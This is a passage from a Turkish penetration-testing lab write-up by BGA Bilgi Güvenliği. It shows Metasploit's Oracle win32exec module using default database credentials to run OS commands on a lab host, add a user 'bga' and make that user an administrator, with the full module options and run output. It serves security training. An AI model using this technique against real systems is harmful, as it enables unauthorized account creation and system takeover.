  • 12. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Module options (auxiliary/admin/oracle/post_exploitation/win32exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD net user bga bga /add no The OS command to execute. DBPASS oracle yes The password to authenticate with. DBUSER system yes The username to authenticate with. RHOST 192.168.1.25 yes The Oracle host. RPORT 1521 yes The TNS port. SID xporacle yes The sid to authenticate with. Sisteme bga adında bir kullanıcı eklendiğini göstermek adına, aşağıda hedef sistem üzerinde mevcut kullanıcılar listelenmiştir. Sisteme eklenen kulacının, Windows sistemlerde en yetkili kullanıcı grubu olan “administrators” grubuna eklemek için gerekli düzenlemelerin yapılmış hali aşağıda verilmiştir. msf auxiliary(win32exec) > show options Module options (auxiliary/admin/oracle/post_exploitation/win32exec): Name Current Setting Required Description ---- --------------- -------- ------------------------- CMD net localgroup administrators bga /add no The OS command to execute. DBPASS oracle yes The password to authenticate with. DBUSER system yes The username to authenticate with. RHOST 192.168.1.25 yes The Oracle host. RPORT 1521 yes The TNS port. SID xporacle yes The sid to authenticate with.
  • 13. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Modülün bu düzenlemeler ile çalıştırılmış halinin çıktısı aşağıda verilmiştir. msf auxiliary(win32exec) > run [*] Creating java source 'SCJ'... [*] CREATE successful [*] Creating procedure 'TLJ'... [*] CREATE successful [*] Sending command: 'net localgroup administrators bga /add' [*] Removing java source 'SCJ'... [*] DROP successful [*] Removing procedure 'TLJ'... [*] DROP successful [*] Auxiliary module execution completed “bga” adındaki kullanıcının sisteme administrators grubuna eklendğini göstermek adına, administrators grubuna dahil olan kullanıcılar aşağıda listelenmiştir. Böylece oracle veritabanı açıklığı kullanılarak işletim sistemi ele geçirilmiş oldu. Not: Bu doküman BGA Bilgi Güvenliği A.Ş için Mesut Türk tarafından hazırlanmıştır.